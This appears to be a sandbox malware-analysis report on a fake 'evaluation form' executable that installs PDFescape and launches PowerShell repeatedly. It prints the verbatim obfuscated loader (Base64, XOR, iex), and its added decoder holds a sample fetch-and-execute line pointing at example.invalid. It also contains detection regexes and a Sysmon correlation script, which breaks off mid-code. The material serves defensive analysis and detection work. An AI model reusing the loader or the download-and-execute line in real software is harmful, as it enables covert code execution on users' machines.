3152 | powershell.exe
4100 | powershell.exe
2184 | powershell.exe
3872 | powershell.exe
4144 | powershell.exe
4188 | powershell.exe
4264 | powershell.exe
4332 | powershell.exe
4400 | powershell.exe
4480 | powershell.exe
4100 | powershell.exe
2184 | powershell.exe
3872 | powershell.exe
3152 | powershell.exe
4144 | powershell.exe
4188 | powershell.exe
4332 | powershell.exe
4264 | powershell.exe
4400 | powershell.exe
4480 | powershell.exe
2824 | PDFescape_Desktop_Installer.exe
2824 | PDFescape_Desktop_Installer.exe
2184 | powershell.exe
2184 | powershell.exe
4100 | powershell.exe
4100 | powershell.exe
2184 | powershell.exe
3152 | powershell.exe
3152 | powershell.exe
4100 | powershell.exe
2184 | powershell.exe
3152 | powershell.exe
2184 | powershell.exe
2184 | powershell.exe
3872 | powershell.exe
3872 | powershell.exe
4100 | powershell.exe
4100 | powershell.exe
4100 | powershell.exe
3152 | powershell.exe
3152 | powershell.exe
3872 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, PDFescape_Desktop_Installer.exe, msiexec.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 3872 | powershell.exe
Token: SeDebugPrivilege | 3152 | powershell.exe
Token: SeDebugPrivilege | 2184 | powershell.exe
Token: SeDebugPrivilege | 4144 | powershell.exe
Token: SeDebugPrivilege | 4100 | powershell.exe
Token: SeDebugPrivilege | 4188 | powershell.exe
Token: SeDebugPrivilege | 4264 | powershell.exe
Token: SeDebugPrivilege | 4332 | powershell.exe
Token: SeDebugPrivilege | 4400 | powershell.exe
Token: SeDebugPrivilege | 4480 | powershell.exe
Token: SeShutdownPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeIncreaseQuotaPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeSecurityPrivilege | 3224 | msiexec.exe
Token: SeCreateTokenPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeAssignPrimaryTokenPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeLockMemoryPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeIncreaseQuotaPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeMachineAccountPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeTcbPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeSecurityPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeTakeOwnershipPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeLoadDriverPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeSystemProfilePrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeSystemtimePrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeProfSingleProcessPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeIncBasePriorityPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeCreatePagefilePrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeCreatePermanentPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeBackupPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeRestorePrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeShutdownPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeDebugPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeAuditPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeSystemEnvironmentPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeChangeNotifyPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeRemoteShutdownPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeUndockPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeSyncAgentPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeEnableDelegationPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeManageVolumePrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeImpersonatePrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeCreateGlobalPrivilege | 2824 | PDFescape_Desktop_Installer.exe
Token: SeBackupPrivilege | 2812 | vssvc.exe
Token: SeRestorePrivilege | 2812 | vssvc.exe
Token: SeAuditPrivilege | 2812 | vssvc.exe
Token: SeBackupPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3224 | msiexec.exe
Token: SeRestorePrivilege | 3224 | msiexec.exe
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes: PDFescape_Desktop_Installer.exe
pid | process
2824 | PDFescape_Desktop_Installer.exe
2824 | PDFescape_Desktop_Installer.exe
-
Suspicious use of SendNotifyMessage 1 IoCs
Processes: PDFescape_Desktop_Installer.exe
pid | process
2824 | PDFescape_Desktop_Installer.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: MicrosoftEdge.exe
pid | process
13120 | MicrosoftEdge.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: Choir-Director-Evaluation-Form.exe, Choir-Director-Evaluation-Form.tmp, PDFescape_Desktop_Installer.exe, msiexec.exe
description | pid | process | target process
PID 1892 wrote to memory of 1520 | 1892 | Choir-Director-Evaluation-Form.exe | Choir-Director-Evaluation-Form.tmp
PID 1892 wrote to memory of 1520 | 1892 | Choir-Director-Evaluation-Form.exe | Choir-Director-Evaluation-Form.tmp
PID 1892 wrote to memory of 1520 | 1892 | Choir-Director-Evaluation-Form.exe | Choir-Director-Evaluation-Form.tmp
PID 1520 wrote to memory of 2824 | 1520 | Choir-Director-Evaluation-Form.tmp | PDFescape_Desktop_Installer.exe
PID 1520 wrote to memory of 2824 | 1520 | Choir-Director-Evaluation-Form.tmp | PDFescape_Desktop_Installer.exe
PID 1520 wrote to memory of 2824 | 1520 | Choir-Director-Evaluation-Form.tmp | PDFescape_Desktop_Installer.exe
PID 2824 wrote to memory of 784 | 2824 | PDFescape_Desktop_Installer.exe | regsvr32.exe
PID 2824 wrote to memory of 784 | 2824 | PDFescape_Desktop_Installer.exe | regsvr32.exe
PID 2824 wrote to memory of 784 | 2824 | PDFescape_Desktop_Installer.exe | regsvr32.exe
PID 2824 wrote to memory of 3176 | 2824 | PDFescape_Desktop_Installer.exe | PDFescapeDesktopInstaller.exe
PID 2824 wrote to memory of 3176 | 2824 | PDFescape_Desktop_Installer.exe | PDFescapeDesktopInstaller.exe
PID 2824 wrote to memory of 3176 | 2824 | PDFescape_Desktop_Installer.exe | PDFescapeDesktopInstaller.exe
PID 1520 wrote to memory of 3872 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 3872 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 3872 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 2184 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 2184 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 2184 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 3152 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 3152 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 3152 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4100 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4100 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4100 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4144 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4144 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4144 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4188 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4188 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4188 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4264 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4264 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4264 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4332 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4332 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4332 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4400 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4400 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4400 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4480 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4480 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 1520 wrote to memory of 4480 | 1520 | Choir-Director-Evaluation-Form.tmp | powershell.exe
PID 3224 wrote to memory of 7056 | 3224 | msiexec.exe | srtasks.exe
PID 3224 wrote to memory of 7056 | 3224 | msiexec.exe | srtasks.exe
PID 3224 wrote to memory of 12172 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 12172 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 4396 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 4396 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 780 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 780 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 5144 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 5144 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 5144 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 5484 | 3224 | msiexec.exe | ws.exe
PID 3224 wrote to memory of 5484 | 3224 | msiexec.exe | ws.exe
PID 3224 wrote to memory of 6088 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 6088 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 6364 | 3224 | msiexec.exe | updater-ws.exe
PID 3224 wrote to memory of 6364 | 3224 | msiexec.exe | updater-ws.exe
PID 3224 wrote to memory of 11144 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 11144 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 6032 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 6032 | 3224 | msiexec.exe | MsiExec.exe
PID 3224 wrote to memory of 5136 | 3224 | msiexec.exe | MsiExec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe (level 1)
"C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-HMJ2A.tmp\Choir-Director-Evaluation-Form.tmp (level 2)
"C:\Users\Admin\AppData\Local\Temp\is-HMJ2A.tmp\Choir-Director-Evaluation-Form.tmp" /SL5="$30030,111934780,999424,C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-A241P.tmp\PDFescape_Desktop_Installer.exe (level 3)
"C:\Users\Admin\AppData\Local\Temp\is-A241P.tmp\PDFescape_Desktop_Installer.exe"
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe (level 4)
regsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"
- Loads dropped DLL
- Modifies registry class
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe (level 4)
"C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer
- Executes dropped EXE
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
command line: identical to the first powershell.exe entry above (same one-liner, same key, same stage-file path)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
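All ten powershell.exe entries above run the same one-liner: read a file from a chain of six directories with 32-hex-character names under C:\Users\Admin (the file itself is named the same way), Base64-decode it, delete the file with remove-item, XOR every byte against the hard-coded 52-character key, UTF-8-decode the result and hand it to iex. The nested for loops reduce to a repeating-key XOR (byte i is combined with key[i mod 52]); PowerShell's -bxor between a [byte] and a [char] uses the character's code, which for this ASCII key is its byte value, and the key is every ASCII letter exactly once, so only the low seven bits of each byte are ever flipped. The script below is an added example written for this page, not code from the report, the sample or PDFescape. It ports the routine to Python so an analyst can decode the sandbox's preserved copy of the stage file (listed under Downloads, MD5 f49af433f9076c15cab2d858be35b939) offline, checks the literal loop port against the simplified form, and pulls URLs and download/execute primitives out of the decoded text. The payload it encodes for its self-test is constructed; example.invalid is not an indicator from this report.

```python
"""
Offline decoder for the stage file loaded by the powershell.exe one-liner in the
process tree above (added example for this page, not code from the sample or the
sandbox).  It reproduces the one-liner's decode routine:

    data = Base64-decode(file text)
    data[i] ^= key[i mod len(key)]      # what the nested for-loops amount to
    script = UTF-8-decode(data)         # then handed to iex

Usage: python decode_stage.py <captured stage file>
With no argument it decodes a constructed self-test sample instead.
"""
import base64
import re
import string
import sys
from typing import Dict, List

# Key copied verbatim from the captured command line.
XOR_KEY = b"oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS"

# Constructed payload for the self-test; example.invalid is not an indicator
# from this report.
SAMPLE_SCRIPT = (
    "$u='http://example.invalid/stage2.ps1';"
    "iex ((New-Object Net.WebClient).DownloadString($u))"
)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: byte i is combined with key[i % len(key)]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_loader_literal(data: bytes, key: bytes) -> bytes:
    """Line-for-line port of the one-liner's loop pair, kept only to show that
    it equals xor_repeating (see loop_port_matches)."""
    buf = bytearray(data)
    n, klen = len(buf), len(key)
    i = 0
    while i < n:                     # for($i=0; $i -lt $data.count;)
        j = 0
        while j < klen:              # for($j=0; $j -lt $key.length; $j++)
            buf[i] ^= key[j]
            i += 1
            if i >= n:
                j = klen             # $j=$key.length forces the inner loop to stop
            j += 1
    return bytes(buf)


def decode_stage(b64_text: str, key: bytes = XOR_KEY) -> str:
    """Reverse the loader: Base64 -> XOR -> UTF-8.  Whitespace in the file is
    ignored, as [Convert]::FromBase64String ignores it."""
    raw = base64.b64decode(b64_text)
    return xor_repeating(raw, key).decode("utf-8")


def encode_stage(script: str, key: bytes = XOR_KEY) -> str:
    """Inverse of decode_stage; used only to build self-test input."""
    return base64.b64encode(xor_repeating(script.encode("utf-8"), key)).decode("ascii")


def key_is_letter_permutation(key: bytes = XOR_KEY) -> bool:
    """The captured key is every ASCII letter exactly once, so the XOR never
    touches the high bit of a byte."""
    return sorted(key.decode("ascii")) == sorted(string.ascii_letters)


def loop_port_matches(lengths=(0, 1, 51, 52, 53, 200, 1000)) -> bool:
    """Self-check that the literal loop port and the simplified form agree,
    including lengths that are not a multiple of the 52-byte key."""
    return all(
        xor_loader_literal(bytes(i % 256 for i in range(n)), XOR_KEY)
        == xor_repeating(bytes(i % 256 for i in range(n)), XOR_KEY)
        for n in lengths
    )


TRIAGE_PATTERNS = {
    "exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "url": re.compile(r"https?://[^\s'\"]+", re.I),
    "startup": re.compile(r"start menu\\programs\\startup", re.I),
}


def triage(script: str) -> Dict[str, List[str]]:
    """First pass over the decoded text: execution, download and persistence
    primitives plus every URL, for the analyst to chase next."""
    return {name: rx.findall(script) for name, rx in TRIAGE_PATTERNS.items()}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8-sig") as fh:   # tolerate a BOM, as ReadAllText does
            text = fh.read()
    else:
        text = encode_stage(SAMPLE_SCRIPT)
    decoded = decode_stage(text)
    print(decoded)
    print(triage(decoded))
```

Run it against the preserved stage file to recover the second-stage script; if the UTF-8 decode raises, the file is not the one this key was written for. The literal port is kept because the simplification is the kind of claim worth proving before it goes into a report.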
[depth 1] C:\Windows\SysWOW64\DllHost.exe
command line: C:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}
- Loads dropped DLL
-
[depth 1] C:\Windows\system32\msiexec.exe
command line: C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\system32\srtasks.exe
command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\preview-handler.dll"
- Loads dropped DLL
- Modifies registry class
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\thumbnail-handler.dll"
- Loads dropped DLL
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\context-menu.dll"
- Loads dropped DLL
- Modifies registry class
-
[depth 2] C:\Windows\syswow64\MsiExec.exe
command line: "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll"
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
[depth 2] C:\Program Files\PDFescape Desktop\ws.exe
command line: "C:\Program Files\PDFescape Desktop\ws.exe" -service
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: C:\Windows\System32\MsiExec.exe -Embedding 1C738FF4F03AEC73B7A07AC7D5F69CD3 E Global\MSI0000
- Loads dropped DLL
-
[depth 2] C:\Program Files\PDFescape Desktop\updater-ws.exe
command line: "C:\Program Files\PDFescape Desktop\updater-ws.exe" -service
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"
- Loads dropped DLL
- Modifies registry class
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll"
- Loads dropped DLL
- Modifies registry class
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-excel-plugin.dll"
- Loads dropped DLL
- Modifies registry class
-
[depth 2] C:\Windows\System32\MsiExec.exe
command line: "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll"
- Loads dropped DLL
-
[depth 2] C:\Windows\syswow64\MsiExec.exe
command line: "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"
- Loads dropped DLL
- Modifies registry class
-
[depth 2] C:\Windows\syswow64\MsiExec.exe
command line: "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
[depth 2] C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe
command line: "C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe" -i "C:\Program Files\PDFescape Desktop\creator\common"
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
[depth 2] C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe
command line: "C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe" -regserver
- Executes dropped EXE
- Loads dropped DLL
-
[depth 2] C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe
command line: "C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe" -service
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
[depth 1] C:\Windows\system32\vssvc.exe
command line: C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
-
[depth 1] \??\c:\windows\system32\svchost.exe
command line: c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
[depth 1] C:\Windows\System32\spoolsv.exe
command line: C:\Windows\System32\spoolsv.exe
- Loads dropped DLL
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
[depth 1] C:\Program Files\PDFescape Desktop\escape.exe
command line: "C:\Program Files\PDFescape Desktop\escape.exe"
- Executes dropped EXE
- Loads dropped DLL
-
[depth 1] C:\Program Files\PDFescape Desktop\ws.exe
command line: "C:\Program Files\PDFescape Desktop\ws.exe"
- Executes dropped EXE
- Modifies registry class
-
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
[depth 1] C:\Windows\system32\browser_broker.exe
command line: C:\Windows\system32\browser_broker.exe -Embedding
- Modifies Internet Explorer settings
-
[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
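The process tree gives a defender three observables worth pairing: a powershell.exe whose command line carries FromBase64String, -bxor, a remove-item of the variable it has just read, 32-hex-character variable names, a chain of 32-hex-character directory names and iex; a .lnk written by that same PowerShell into the user's Startup folder under a deliberately mixed-case path (MIcroSOft\WiNdOws\stArT meNU); and the fact that the recorded image is the SysWOW64 copy although the command line names System32, which is WoW64 file-system redirection from the 32-bit installer parent, so a rule keyed on the System32 path would miss it. What follows is an added detection example written for this page, not a rule shipped with the sandbox or any product. It scores Sysmon-style ProcessCreate (event 1) and FileCreate (event 11) records, compares paths case-insensitively so the mixed-case Startup spelling cannot dodge a string match, matches the image on file name alone so both PowerShell copies are covered, and correlates the two findings on the process id. The records it runs over are constructed for the example, shaped like the captured command line but with shortened, made-up variable and directory names; they are not logs from this run.

```python
"""
Detection logic for the loader-plus-persistence pattern in the process tree
above (added example for this page, not a rule from the sandbox or any vendor).
It evaluates Sysmon-style records: event 1 (ProcessCreate, scored on the
command line) and event 11 (FileCreate, a .lnk written to the Startup folder by
a script host), then correlates both on the process id.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

# (name, pattern applied to the full command line, weight)
CMDLINE_RULES = [
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("xor_decode",    re.compile(r"-bxor\b", re.I), 2),
    ("invoke_expr",   re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
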